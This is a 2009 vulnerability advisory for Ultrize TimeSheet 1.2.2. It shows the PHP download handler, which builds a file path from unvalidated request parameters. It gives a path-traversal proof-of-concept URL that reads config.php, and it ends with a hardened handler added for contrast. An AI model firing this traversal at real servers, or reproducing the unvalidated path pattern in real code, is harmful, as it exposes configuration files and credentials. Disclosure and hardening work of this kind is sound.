
# Title : Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability
# Published : 2009-07-30
# Author : GoLd_M


Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability
Code page  /actions/downloadFile.php

====
<?php
//** This script performs the actual file download

$fileName = $_REQUEST['fileName']; // <--!! user-controlled, unvalidated
$job_id = $_REQUEST['job_id']; // <--!! user-controlled, unvalidated
$fullFile = $config['upload_dir'].$job_id.'/'.$fileName; // <--!! concatenated straight into a path

if (file_exists($fullFile))
{
    header("Content-Type: application/octet-stream");
    header("Content-Length: ".filesize($fullFile));

    header('Content-Disposition: attachment; fileName="'.$fileName.'"');

    readfile($fullFile); // <--!! any readable file under the resolved path is sent to the client
}
else
{
    header("HTTP/1.0 404 Not Found");
    print "<h1>File not found. </h1>";
    print $fileName;
    print "<hr>Please make sure your file paths are correct: {$config['upload_dir']}/{$job_id}/$fileName}<br />";
}

?>
====

PoC
/actions/downloadFile.php?fileName=../config.php
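For contrast, a hardened version of the same download handler, added here as an example and not taken from Ultrize TimeSheet: both request parameters are whitelisted before any filesystem call, and the canonicalised path is checked to still lie inside `$config['upload_dir']` (assumed, as in the original, to be set by the application; job ids are assumed to be numeric).

```php
<?php
// Hardened download handler (added example, not the vendor's code).
// Assumes $config['upload_dir'] is set by the application and that
// job ids are numeric.

function resolveUploadPath(string $uploadDir, string $jobId, string $fileName): ?string
{
    // Whitelist the two user-supplied components: a numeric job id and a
    // plain file name with no directory separators and no dot-segments.
    if (!preg_match('/^[0-9]+$/', $jobId)) {
        return null;
    }
    if (!preg_match('/^[A-Za-z0-9._-]+$/', $fileName) || strpos($fileName, '..') !== false) {
        return null;
    }

    // Canonicalise both the base directory and the candidate file; realpath()
    // returns false when the target does not exist.
    $base = realpath($uploadDir);
    $full = realpath($uploadDir . '/' . $jobId . '/' . $fileName);
    if ($base === false || $full === false) {
        return null;
    }

    // Containment check on the resolved path: catches symlinks and anything
    // the regexes above might not anticipate.
    if (strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return is_file($full) ? $full : null;
}

$fullFile = resolveUploadPath(
    $config['upload_dir'],
    $_REQUEST['job_id'] ?? '',
    $_REQUEST['fileName'] ?? ''
);

if ($fullFile === null) {
    header("HTTP/1.0 404 Not Found");
    // Unlike the original, do not reflect the requested name or path into the page.
    print "<h1>File not found.</h1>";
    exit;
}

header("Content-Type: application/octet-stream");
header("Content-Length: " . filesize($fullFile));
// basename() of the resolved path, not the raw parameter, goes into the header.
header('Content-Disposition: attachment; filename="' . basename($fullFile) . '"');
readfile($fullFile);
```

With this version the PoC request above is rejected at the file-name whitelist, and a request that passes the whitelist but resolves outside the upload directory is rejected by the containment check.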


# www.Syue.com [2009-07-30]